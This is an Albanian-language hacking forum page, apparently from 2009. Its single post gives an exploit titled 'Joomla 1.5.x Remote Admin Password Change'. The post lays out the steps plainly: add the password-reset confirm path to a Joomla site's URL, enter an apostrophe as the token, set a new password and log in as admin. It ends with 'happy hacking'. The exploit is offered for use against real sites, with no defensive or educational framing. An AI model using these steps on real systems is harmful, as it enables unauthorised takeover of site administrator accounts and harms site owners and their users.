...:::Mesohu-Ks:::...
Pershendetje vizitor i nderuar...
Me sa duket, ju nuk jeni identifikuar akoma ne faqen tone, ndaj po ju paraqitet ky mesazh per tju kujtuar se ju mund te identifikoheni qe te merrni pjese ne
diskutimet dhe temat e shumta te forumit tone.

- Ne qofte se ende nuk keni nje Llogari personale ne forumin ton, mund ta hapni nje te tille duke u Regjistruar
-Regjistrimi eshte falas dhe ju merr koh maksimumi 1 min...

-Gjithsesi ju falenderojme shume, per kohen qe fute ne dispozicionper te n'a vizituar ne faqen tone.

Me Respekt dhe Kenaqesi:
Staffi i Forumit : Mesohu-ks

...:::Mesohu-Ks:::...

...:::Mesohu-Ks:::...
 
ForumPortalPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Joomla 1.5.x Remote Admin Password Change

Shko poshtë 
AutoriMesazh
c00deX
Fillestar/e
Fillestar/e
avatar

Numri i postimeve : 10
Join date : 11/05/2009

MesazhTitulli: Joomla 1.5.x Remote Admin Password Change   Mon May 11, 2009 8:57 pm

[x] Dork : e kerkon nje web ..

[x] Exploit : index.php?option=com_user&view=reset&layout=confir m

[x] Sqarimi : Kerkon nje web joomla psh . .
http://www.livedemo.com/joomla/ tash ja shton ket pjes
index.php?option=com_user&view=reset&layout=confir m dhe bahet keshtu
http://www.livedemo.com/joomla/index...layout=confirm
tash te del me shkru diqka token aty e shkruan vetem (') pa kllapa
tash e shkruan passwordin e ri .. dy her aty dhe hin login
username : admin
password : qysh e ke shkru
happy hacking .
#miw0rm.com
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.khc-group.tk
 
Joomla 1.5.x Remote Admin Password Change
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
...:::Mesohu-Ks:::... :: Mesohu-ks Boxi :: Exploit-
Kërce tek: